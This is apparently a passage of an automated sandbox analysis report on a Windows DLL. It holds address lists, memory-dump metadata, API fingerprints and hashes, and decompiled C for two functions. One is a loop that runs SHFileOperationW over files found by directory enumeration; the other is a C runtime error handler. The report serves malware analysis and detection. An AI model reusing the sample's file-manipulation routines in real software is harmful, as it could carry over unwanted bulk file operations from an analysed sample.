                                                                                                                                                  0x6770b8c6
                                                                                                                                                  0x6770b8c8
                                                                                                                                                  0x6770b8d1
                                                                                                                                                  0x6770b8d5
                                                                                                                                                  0x6770b8d7
                                                                                                                                                  0x6770b8ca
                                                                                                                                                  0x6770b8ca
                                                                                                                                                  0x6770b8ca
                                                                                                                                                  0x6770b8da
                                                                                                                                                  0x6770b8e2
                                                                                                                                                  0x6770b8e2
                                                                                                                                                  0x6770b8ec
                                                                                                                                                  0x6770b8ee
                                                                                                                                                  0x6770b8ee
                                                                                                                                                  0x6770b8f0
                                                                                                                                                  0x6770b8f4
                                                                                                                                                  0x6770b8f4
                                                                                                                                                  0x6770b8f6
                                                                                                                                                  0x6770b8f8
                                                                                                                                                  0x6770b8fa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b8fc
                                                                                                                                                  0x6770b8fc
                                                                                                                                                  0x6770b8ff
                                                                                                                                                  0x6770b921
                                                                                                                                                  0x6770b926
                                                                                                                                                  0x6770b926
                                                                                                                                                  0x6770b92d
                                                                                                                                                  0x6770b931
                                                                                                                                                  0x6770b933
                                                                                                                                                  0x6770b936
                                                                                                                                                  0x6770b939
                                                                                                                                                  0x6770b93c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b942
                                                                                                                                                  0x6770b944
                                                                                                                                                  0x6770b94f
                                                                                                                                                  0x6770b94f
                                                                                                                                                  0x6770b952
                                                                                                                                                  0x6770b955
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b955
                                                                                                                                                  0x6770b946
                                                                                                                                                  0x6770b949
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b949
                                                                                                                                                  0x6770b901
                                                                                                                                                  0x6770b90f
                                                                                                                                                  0x6770b90f
                                                                                                                                                  0x6770b912
                                                                                                                                                  0x6770b915
                                                                                                                                                  0x6770b917
                                                                                                                                                  0x6770b917
                                                                                                                                                  0x6770b917
                                                                                                                                                  0x6770b91a
                                                                                                                                                  0x6770b91c
                                                                                                                                                  0x6770b8f4
                                                                                                                                                  0x6770b8f6
                                                                                                                                                  0x6770b8f8
                                                                                                                                                  0x6770b8fa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b8fa
                                                                                                                                                  0x6770b8f4
                                                                                                                                                  0x6770b876
                                                                                                                                                  0x6770b87b
                                                                                                                                                  0x6770b87f
                                                                                                                                                  0x6770b888
                                                                                                                                                  0x6770b881
                                                                                                                                                  0x6770b881
                                                                                                                                                  0x6770b881
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b87f
                                                                                                                                                  0x6770b85d
                                                                                                                                                  0x6770b85d
                                                                                                                                                  0x6770b860
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b860
                                                                                                                                                  0x6770b730
                                                                                                                                                  0x6770b733
                                                                                                                                                  0x6770b7fd
                                                                                                                                                  0x6770b800
                                                                                                                                                  0x6770b804
                                                                                                                                                  0x6770b809
                                                                                                                                                  0x6770b80e
                                                                                                                                                  0x6770b811
                                                                                                                                                  0x6770b813
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b819
                                                                                                                                                  0x6770b81d
                                                                                                                                                  0x6770b81d
                                                                                                                                                  0x6770b821
                                                                                                                                                  0x6770b824
                                                                                                                                                  0x6770b82b
                                                                                                                                                  0x6770b826
                                                                                                                                                  0x6770b826
                                                                                                                                                  0x6770b826
                                                                                                                                                  0x6770b82d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b82d
                                                                                                                                                  0x6770b739
                                                                                                                                                  0x6770b73e
                                                                                                                                                  0x6770b740
                                                                                                                                                  0x6770b7e8
                                                                                                                                                  0x6770b7ee
                                                                                                                                                  0x6770b7f1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b7f3
                                                                                                                                                  0x6770b7f8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b7f8
                                                                                                                                                  0x6770b746
                                                                                                                                                  0x6770b749
                                                                                                                                                  0x6770b7ac
                                                                                                                                                  0x6770b7b1
                                                                                                                                                  0x6770b7b6
                                                                                                                                                  0x6770b7b6
                                                                                                                                                  0x6770b7bb
                                                                                                                                                  0x6770b7bb
                                                                                                                                                  0x6770b7c1
                                                                                                                                                  0x6770b7c5
                                                                                                                                                  0x6770b7ca
                                                                                                                                                  0x6770b7ca
                                                                                                                                                  0x6770b7ce
                                                                                                                                                  0x6770b7d1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b7d7
                                                                                                                                                  0x6770b7dd
                                                                                                                                                  0x6770b7dd
                                                                                                                                                  0x6770b7e1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b7e1
                                                                                                                                                  0x6770b74b
                                                                                                                                                  0x6770b74e
                                                                                                                                                  0x6770b5ff
                                                                                                                                                  0x6770b5ff
                                                                                                                                                  0x6770b603
                                                                                                                                                  0x6770b60b
                                                                                                                                                  0x6770b60e
                                                                                                                                                  0x6770b612
                                                                                                                                                  0x6770b617
                                                                                                                                                  0x6770b61a
                                                                                                                                                  0x6770b773
                                                                                                                                                  0x6770b776
                                                                                                                                                  0x6770b77c
                                                                                                                                                  0x6770b784
                                                                                                                                                  0x6770b789
                                                                                                                                                  0x6770b79a
                                                                                                                                                  0x6770b79a
                                                                                                                                                  0x6770b79c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b78e
                                                                                                                                                  0x6770b790
                                                                                                                                                  0x6770b794
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b796
                                                                                                                                                  0x6770b796
                                                                                                                                                  0x6770b796
                                                                                                                                                  0x6770b7a1
                                                                                                                                                  0x6770b7a4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b7a4
                                                                                                                                                  0x6770b620
                                                                                                                                                  0x6770b623
                                                                                                                                                  0x6770b626
                                                                                                                                                  0x6770b62e
                                                                                                                                                  0x6770b631
                                                                                                                                                  0x6770b633
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b639
                                                                                                                                                  0x6770b639
                                                                                                                                                  0x6770b639
                                                                                                                                                  0x6770b63c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b642
                                                                                                                                                  0x6770b645
                                                                                                                                                  0x6770b649
                                                                                                                                                  0x6770b64e
                                                                                                                                                  0x6770b651
                                                                                                                                                  0x6770b653
                                                                                                                                                  0x6770b655
                                                                                                                                                  0x6770b655
                                                                                                                                                  0x6770b655
                                                                                                                                                  0x6770b653
                                                                                                                                                  0x6770b658
                                                                                                                                                  0x6770b65b
                                                                                                                                                  0x6770b65e
                                                                                                                                                  0x6770b661
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b663
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b663
                                                                                                                                                  0x6770b661
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b639
                                                                                                                                                  0x6770b754
                                                                                                                                                  0x6770b759
                                                                                                                                                  0x6770b75b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b761
                                                                                                                                                  0x6770b766
                                                                                                                                                  0x6770b768
                                                                                                                                                  0x6770ba63
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770ba63
                                                                                                                                                  0x6770b76e
                                                                                                                                                  0x6770b76e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b76e
                                                                                                                                                  0x6770b4ff
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b505
                                                                                                                                                  0x6770b508
                                                                                                                                                  0x6770b6da
                                                                                                                                                  0x6770b6da
                                                                                                                                                  0x6770b6e1
                                                                                                                                                  0x6770b6e1
                                                                                                                                                  0x6770b6e5
                                                                                                                                                  0x6770b6e5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b6e5
                                                                                                                                                  0x6770b50e
                                                                                                                                                  0x6770b511
                                                                                                                                                  0x6770b668
                                                                                                                                                  0x6770b66f
                                                                                                                                                  0x6770b671
                                                                                                                                                  0x6770b671
                                                                                                                                                  0x6770b671
                                                                                                                                                  0x6770b674
                                                                                                                                                  0x6770b674
                                                                                                                                                  0x6770b678
                                                                                                                                                  0x6770b67c
                                                                                                                                                  0x6770b682
                                                                                                                                                  0x6770b687
                                                                                                                                                  0x6770b68c
                                                                                                                                                  0x6770b691
                                                                                                                                                  0x6770b694
                                                                                                                                                  0x6770b6ca
                                                                                                                                                  0x6770b696
                                                                                                                                                  0x6770b696
                                                                                                                                                  0x6770b69a
                                                                                                                                                  0x6770b69e
                                                                                                                                                  0x6770b6aa
                                                                                                                                                  0x6770b6aa
                                                                                                                                                  0x6770b6ae
                                                                                                                                                  0x6770b6b3
                                                                                                                                                  0x6770b6b7
                                                                                                                                                  0x6770b6bc
                                                                                                                                                  0x6770b6bf
                                                                                                                                                  0x6770b6c1
                                                                                                                                                  0x6770b6c3
                                                                                                                                                  0x6770b6c3
                                                                                                                                                  0x6770b6c1
                                                                                                                                                  0x6770b6ce
                                                                                                                                                  0x6770b6ce
                                                                                                                                                  0x6770b6d2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b6d2
                                                                                                                                                  0x6770b517
                                                                                                                                                  0x6770b51a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b520
                                                                                                                                                  0x6770b523
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b529
                                                                                                                                                  0x6770b52c
                                                                                                                                                  0x6770b5f3
                                                                                                                                                  0x6770b5fa
                                                                                                                                                  0x6770b5fc
                                                                                                                                                  0x6770b5fc
                                                                                                                                                  0x6770b5fc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b5fa
                                                                                                                                                  0x6770b532
                                                                                                                                                  0x6770b535
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b53b
                                                                                                                                                  0x6770b53e
                                                                                                                                                  0x6770b58f
                                                                                                                                                  0x6770b592
                                                                                                                                                  0x6770b596
                                                                                                                                                  0x6770b59b
                                                                                                                                                  0x6770b59e
                                                                                                                                                  0x6770b5d9
                                                                                                                                                  0x6770b5d9
                                                                                                                                                  0x6770b5e3
                                                                                                                                                  0x6770b5e8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b5eb
                                                                                                                                                  0x6770b5a0
                                                                                                                                                  0x6770b5a4
                                                                                                                                                  0x6770b5a7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b5a9
                                                                                                                                                  0x6770b5a9
                                                                                                                                                  0x6770b5ae
                                                                                                                                                  0x6770b5b3
                                                                                                                                                  0x6770b5cb
                                                                                                                                                  0x6770b5cf
                                                                                                                                                  0x6770b5d2
                                                                                                                                                  0x6770b5b5
                                                                                                                                                  0x6770b5b8
                                                                                                                                                  0x6770b5b8
                                                                                                                                                  0x6770b5bc
                                                                                                                                                  0x6770b5bd
                                                                                                                                                  0x6770b5c6
                                                                                                                                                  0x6770b5c6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b5b3
                                                                                                                                                  0x6770b5a7
                                                                                                                                                  0x6770b540
                                                                                                                                                  0x6770b543
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b549
                                                                                                                                                  0x6770b54c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b54c
                                                                                                                                                  0x6770be3f
                                                                                                                                                  0x6770be42
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770be44
                                                                                                                                                  0x6770be48
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770be48
                                                                                                                                                  0x6770b435
                                                                                                                                                  0x6770b3e7
                                                                                                                                                  0x6770b3e7
                                                                                                                                                  0x6770b3ec
                                                                                                                                                  0x6770b3f2
                                                                                                                                                  0x6770b3f7
                                                                                                                                                  0x6770b3fe
                                                                                                                                                  0x6770b404
                                                                                                                                                  0x6770b404
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DecodePointerwrite_multi_char$_errno_invalid_parameter_noinfo$_getptdfreewrite_char
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3562693915-0
                                                                                                                                                  • Opcode ID: e0fe4aad37ae6926f75354d7cf0498cad9a8ffa1e3739c63f03bf7e982d74d38
                                                                                                                                                  • Instruction ID: b3bd997401dc6731819619887412e85782034c5f106b8d57ecee495fa176f5f5
                                                                                                                                                  • Opcode Fuzzy Hash: e0fe4aad37ae6926f75354d7cf0498cad9a8ffa1e3739c63f03bf7e982d74d38
                                                                                                                                                  • Instruction Fuzzy Hash: ED4215F2608680C6EB118B29DE4036E77F1F789788F10082ADF5957BB4DB79EA51CB40
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67703C7C, Relevance: 19.6, APIs: 13, Instructions: 93stringfileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 16%
                                                                                                                                                  			E67703C7C(void* __edi, void* __esp, long long __rbx, long long __rdi, long long __rsi) {
				int _t52;
				void* _t87;
				signed long long _t88;
				signed long long _t89;
				long long _t90;
				signed long long _t99;
				void* _t128;
				void* _t130;
				signed long long _t131;

				_t79 = __esp;
				_t76 = __edi;
				_t87 = _t130;
				 *((long long*)(_t87 + 8)) = __rbx;
				 *((long long*)(_t87 + 0x10)) = __rsi;
				 *((long long*)(_t87 + 0x18)) = __rdi;
				_t128 = _t87 - 0x948;
				_t131 = _t130 - 0xa40;
				_t88 =  *0x67716000; // 0x9b7b11e8241
				_t89 = _t88 ^ _t131;
				 *(_t128 + 0x930) = _t89;
				E67703E48();
				if(_t89 != 0) {
					lstrcpyW();
					free(??);
					_t52 = lstrlenW(??);
					 *((long long*)(_t131 + 0x20)) = __rsi;
					 *((intOrPtr*)(_t131 + 0x28)) = 3;
					_t99 = _t52;
					_t90 = _t128 + 0x1b0;
					 *((long long*)(_t131 + 0x38)) = __rsi;
					 *((short*)(_t128 + 0x1b2 + _t99 * 2)) = 0;
					 *((short*)(_t128 + 0x1b0 + _t99 * 2)) = 0;
					 *((long long*)(_t131 + 0x30)) = _t90;
					 *((intOrPtr*)(_t131 + 0x44)) = 0;
					 *((long long*)(_t131 + 0x48)) = __rsi;
					 *((long long*)(_t131 + 0x50)) = __rsi;
					 *((short*)(_t131 + 0x40)) = 0x614;
					if(SHFileOperationW(??) != 0) {
						lstrcpyW();
						lstrcatW(??, ??);
						FindFirstFileW(??, ??);
						memset(__edi, 0, 0x28c << 0);
						_t79 = __esp + 0xc;
						_t76 = __edi + 0x28c;
						if(_t90 != 0xffffffff) {
							do {
								lstrcpyW();
								lstrcatW(??, ??);
								lstrcatW(??, ??);
								 *((long long*)(_t131 + 0x30)) = _t128 + 0x3e0;
								SHFileOperationW(??);
								memset(_t76, 0, 0x2b4 << 0);
								_t79 = _t79 + 0xc;
								_t76 = _t76 + 0x2b4;
							} while (FindNextFileW(??, ??) != 0);
						}
						FindClose();
					}
					memset(_t76, 0, 0x22c << 0);
				}
				return E67706F80(0,  *(_t128 + 0x930) ^ _t131);
			}












                                                                                                                                                  0x67703c7c
                                                                                                                                                  0x67703c7c
                                                                                                                                                  0x67703c7c
                                                                                                                                                  0x67703c7f
                                                                                                                                                  0x67703c83
                                                                                                                                                  0x67703c87
                                                                                                                                                  0x67703c8c
                                                                                                                                                  0x67703c93
                                                                                                                                                  0x67703c9a
                                                                                                                                                  0x67703ca1
                                                                                                                                                  0x67703ca4
                                                                                                                                                  0x67703cab
                                                                                                                                                  0x67703cb8
                                                                                                                                                  0x67703cc8
                                                                                                                                                  0x67703cd1
                                                                                                                                                  0x67703cdd
                                                                                                                                                  0x67703ce3
                                                                                                                                                  0x67703ce8
                                                                                                                                                  0x67703cf0
                                                                                                                                                  0x67703cf3
                                                                                                                                                  0x67703cfa
                                                                                                                                                  0x67703cff
                                                                                                                                                  0x67703d07
                                                                                                                                                  0x67703d0f
                                                                                                                                                  0x67703d1e
                                                                                                                                                  0x67703d22
                                                                                                                                                  0x67703d27
                                                                                                                                                  0x67703d2c
                                                                                                                                                  0x67703d39
                                                                                                                                                  0x67703d4d
                                                                                                                                                  0x67703d61
                                                                                                                                                  0x67703d73
                                                                                                                                                  0x67703d8a
                                                                                                                                                  0x67703d8a
                                                                                                                                                  0x67703d8a
                                                                                                                                                  0x67703d90
                                                                                                                                                  0x67703d92
                                                                                                                                                  0x67703da0
                                                                                                                                                  0x67703db4
                                                                                                                                                  0x67703dc5
                                                                                                                                                  0x67703dd7
                                                                                                                                                  0x67703ddc
                                                                                                                                                  0x67703df5
                                                                                                                                                  0x67703df5
                                                                                                                                                  0x67703df5
                                                                                                                                                  0x67703e00
                                                                                                                                                  0x67703d92
                                                                                                                                                  0x67703e07
                                                                                                                                                  0x67703e07
                                                                                                                                                  0x67703e1b
                                                                                                                                                  0x67703e1b
                                                                                                                                                  0x67703e44

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 67703E48: free.LIBCMT ref: 67703E77
                                                                                                                                                  • lstrcpyW.KERNEL32 ref: 67703CC8
                                                                                                                                                  • free.LIBCMT ref: 67703CD1
                                                                                                                                                    • Part of subcall function 67706FA0: HeapFree.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FB6
                                                                                                                                                    • Part of subcall function 67706FA0: _errno.LIBCMT ref: 67706FC0
                                                                                                                                                    • Part of subcall function 67706FA0: GetLastError.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FC8
                                                                                                                                                  • lstrlenW.KERNEL32 ref: 67703CDD
                                                                                                                                                  • SHFileOperationW.SHELL32 ref: 67703D31
                                                                                                                                                  • lstrcpyW.KERNEL32 ref: 67703D4D
                                                                                                                                                  • lstrcatW.KERNEL32 ref: 67703D61
                                                                                                                                                  • FindFirstFileW.KERNEL32 ref: 67703D73
                                                                                                                                                  • lstrcpyW.KERNEL32 ref: 67703DA0
                                                                                                                                                  • lstrcatW.KERNEL32 ref: 67703DB4
                                                                                                                                                  • lstrcatW.KERNEL32 ref: 67703DC5
                                                                                                                                                  • SHFileOperationW.SHELL32 ref: 67703DDC
                                                                                                                                                  • FindNextFileW.KERNEL32 ref: 67703DFA
                                                                                                                                                  • FindClose.KERNEL32 ref: 67703E07
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$Findlstrcatlstrcpy$Operationfree$CloseErrorFirstFreeHeapLastNext_errnolstrlen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3145283940-0
                                                                                                                                                  • Opcode ID: e0ce5021348c70b9dc1952024b46311c698406525ed674586a7bc37abaa865a8
                                                                                                                                                  • Instruction ID: ef429e095b08dce68c53c2ed408b7cb6a46a71cd5de112080f4a9ff05914d3bb
                                                                                                                                                  • Opcode Fuzzy Hash: e0ce5021348c70b9dc1952024b46311c698406525ed674586a7bc37abaa865a8
                                                                                                                                                  • Instruction Fuzzy Hash: CB416332218BC595EB20CF20E8547D973A6F798B8CF940626DA5D4BB58EF79C259C700
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 677030C4, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 75stringfileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: lstrcat$Find$File$CloseFirstNextlstrcpymallocrealloc
                                                                                                                                                  • String ID: <D>
                                                                                                                                                  • API String ID: 806728431-4185127804
                                                                                                                                                  • Opcode ID: 00da825b18d9a894d27b89ce178f495b61d7323db49ee25795e2579c453a9825
                                                                                                                                                  • Instruction ID: 6b7bb101de48a590567603d9bd4b37c47ec4effa09aef2f58cf6a81128d820de
                                                                                                                                                  • Opcode Fuzzy Hash: 00da825b18d9a894d27b89ce178f495b61d7323db49ee25795e2579c453a9825
                                                                                                                                                  • Instruction Fuzzy Hash: BE31AF7130CA8485EB108B25E848799B3A1F759BA8F994B26CE7E077D8DF7DC649C700
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 677089EC, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 159fileCOMMONCrypto
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 69%
                                                                                                                                                  			E677089EC(char __ecx, void* __edx, void* __eflags, long long __rbx, void* __rdx, long long __rsi, long long __rbp, void* __r9, long long _a16, long long _a24, long long _a32) {
				void* _v24;
				signed int _v40;
				intOrPtr _v53;
				char _v552;
				void* _v568;
				long long _v584;
				void* _t30;
				void* _t34;
				void* _t36;
				short _t47;
				void* _t48;
				char _t53;
				void* _t54;
				signed long long _t70;
				signed long long _t71;
				signed long long _t75;
				void* _t89;
				void* _t96;
				long long _t99;
				void* _t104;
				char* _t107;
				void* _t114;
				void* _t117;

				_t114 = __r9;
				_t99 = __rsi;
				_t89 = __rdx;
				_t42 = __ecx;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t105 = _t104 - 0x250;
				_t70 =  *0x67716000; // 0x9b7b11e8241
				_t71 = _t70 ^ _t104 - 0x00000250;
				_v40 = _t71;
				_t53 = __ecx;
				E677089C0(__ecx, _t71);
				_t75 = _t71;
				if(_t71 == 0) {
					L24:
					return E67706F80(_t42, _v40 ^ _t105);
				}
				_t5 = _t99 + 3; // 0x3
				if(E6770D930(_t5, __edx, _t71) == 1) {
					L18:
					_t42 = 0xfffffff4;
					_t30 = GetStdHandle(??);
					if(_t71 != 0 && _t71 != 0xffffffff) {
						_t47 = 0;
						_t16 =  &_v552; // 0x354
						_t107 = _t16;
						while(1) {
							_t42 =  *_t75;
							 *_t107 =  *_t75;
							if( *_t75 == 0) {
								break;
							}
							_t47 = _t47 + 1;
							_t107 = _t107 + 1;
							_t75 = _t75 + 2;
							if(_t47 < 0x1f4) {
								continue;
							}
							break;
						}
						_v53 = sil;
						E6770D5B0(_t30,  &_v552);
						_v584 = _t99;
						WriteFile(??, ??, ??, ??, ??);
					}
					goto L24;
				}
				_t6 = _t99 + 3; // 0x3
				_t42 = _t6;
				if(E6770D930(_t6, __edx, _t71) != 0 ||  *0x67717418 != 1) {
					if(_t53 == 0xfc) {
						goto L24;
					}
					r12d = 0x314;
					_t48 = r12d;
					_t34 = E67707F34(_t71, 0x677179f0, _t89, L"Runtime Error!\n\nProgram: ");
					_t42 = 0;
					if(_t34 != 0) {
						L17:
						r9d = 0;
						r8d = 0;
						_v584 = _t99;
						E677091B0();
						asm("int3");
						goto L18;
					}
					r8d = 0x104;
					 *0x67717c2a = 0;
					_t35 = GetModuleFileNameW(??, ??, ??);
					_t54 = _t117 - 0x19;
					if(_t35 == 0) {
						_t48 = _t54;
						if(E67707F34(_t71, 0x67717a22, 0x67717a22, L"<program name unknown>") != 0) {
							r9d = 0;
							r8d = 0;
							_t48 = 0;
							_t42 = 0;
							_v584 = _t99;
							E677091B0();
							asm("int3");
						}
					}
					_t36 = E6770BEB0(_t35, 0x67717a22);
					_t71 = _t71 + 1;
					if(_t71 > 0x3c) {
						E6770BEB0(_t36, 0x67717a22);
						r9d = 3;
						_t87 = 0x677179f0 + _t71 * 2 - 0x44;
						_t71 = 0x677179f0 + _t71 * 2 - 0x44 - 0x67717a22 >> 1;
						if(E6770D860(_t48, _t71, _t87, _t96 - _t71, L"...", _t114) != 0) {
							r9d = 0;
							r8d = 0;
							_t42 = 0;
							_v584 = _t99;
							E677091B0();
							asm("int3");
						}
					}
					if(E67707AD0(_t71, 0x677179f0, _t117, L"\n\n") != 0) {
						L16:
						r9d = 0;
						r8d = 0;
						_v584 = _t99;
						E677091B0();
						asm("int3");
						goto L17;
					} else {
						if(E67707AD0(_t71, 0x677179f0, _t117, _t75) != 0) {
							r9d = 0;
							r8d = 0;
							_v584 = _t99;
							E677091B0();
							asm("int3");
							goto L16;
						}
						r8d = 0x12010;
						E6770D658(0x677179f0, L"Microsoft Visual C++ Runtime Library", _t114);
						goto L24;
					}
				} else {
					goto L18;
				}
			}


























                                                                                                                                                  0x677089ec
                                                                                                                                                  0x677089ec
                                                                                                                                                  0x677089ec
                                                                                                                                                  0x677089ec
                                                                                                                                                  0x677089ec
                                                                                                                                                  0x677089f1
                                                                                                                                                  0x677089f6
                                                                                                                                                  0x67708a00
                                                                                                                                                  0x67708a07
                                                                                                                                                  0x67708a0e
                                                                                                                                                  0x67708a11
                                                                                                                                                  0x67708a19
                                                                                                                                                  0x67708a1b
                                                                                                                                                  0x67708a22
                                                                                                                                                  0x67708a28
                                                                                                                                                  0x67708c1c
                                                                                                                                                  0x67708c48
                                                                                                                                                  0x67708c48
                                                                                                                                                  0x67708a2e
                                                                                                                                                  0x67708a39
                                                                                                                                                  0x67708bb4
                                                                                                                                                  0x67708bb4
                                                                                                                                                  0x67708bb9
                                                                                                                                                  0x67708bc5
                                                                                                                                                  0x67708bcd
                                                                                                                                                  0x67708bcf
                                                                                                                                                  0x67708bcf
                                                                                                                                                  0x67708bd4
                                                                                                                                                  0x67708bd4
                                                                                                                                                  0x67708bd6
                                                                                                                                                  0x67708bdc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67708bde
                                                                                                                                                  0x67708be0
                                                                                                                                                  0x67708be3
                                                                                                                                                  0x67708bed
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67708bed
                                                                                                                                                  0x67708bf4
                                                                                                                                                  0x67708bfc
                                                                                                                                                  0x67708c11
                                                                                                                                                  0x67708c16
                                                                                                                                                  0x67708c16
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67708bc5
                                                                                                                                                  0x67708a3f
                                                                                                                                                  0x67708a3f
                                                                                                                                                  0x67708a49
                                                                                                                                                  0x67708a5e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67708a6b
                                                                                                                                                  0x67708a7b
                                                                                                                                                  0x67708a7e
                                                                                                                                                  0x67708a83
                                                                                                                                                  0x67708a87
                                                                                                                                                  0x67708ba1
                                                                                                                                                  0x67708ba1
                                                                                                                                                  0x67708ba4
                                                                                                                                                  0x67708ba9
                                                                                                                                                  0x67708bae
                                                                                                                                                  0x67708bb3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67708bb3
                                                                                                                                                  0x67708a94
                                                                                                                                                  0x67708a9a
                                                                                                                                                  0x67708aa4
                                                                                                                                                  0x67708aaa
                                                                                                                                                  0x67708ab1
                                                                                                                                                  0x67708aba
                                                                                                                                                  0x67708ac6
                                                                                                                                                  0x67708ac8
                                                                                                                                                  0x67708acb
                                                                                                                                                  0x67708ace
                                                                                                                                                  0x67708ad0
                                                                                                                                                  0x67708ad2
                                                                                                                                                  0x67708ad7
                                                                                                                                                  0x67708adc
                                                                                                                                                  0x67708adc
                                                                                                                                                  0x67708ac6
                                                                                                                                                  0x67708ae0
                                                                                                                                                  0x67708ae5
                                                                                                                                                  0x67708aec
                                                                                                                                                  0x67708af1
                                                                                                                                                  0x67708afd
                                                                                                                                                  0x67708b03
                                                                                                                                                  0x67708b0e
                                                                                                                                                  0x67708b1e
                                                                                                                                                  0x67708b20
                                                                                                                                                  0x67708b23
                                                                                                                                                  0x67708b28
                                                                                                                                                  0x67708b2a
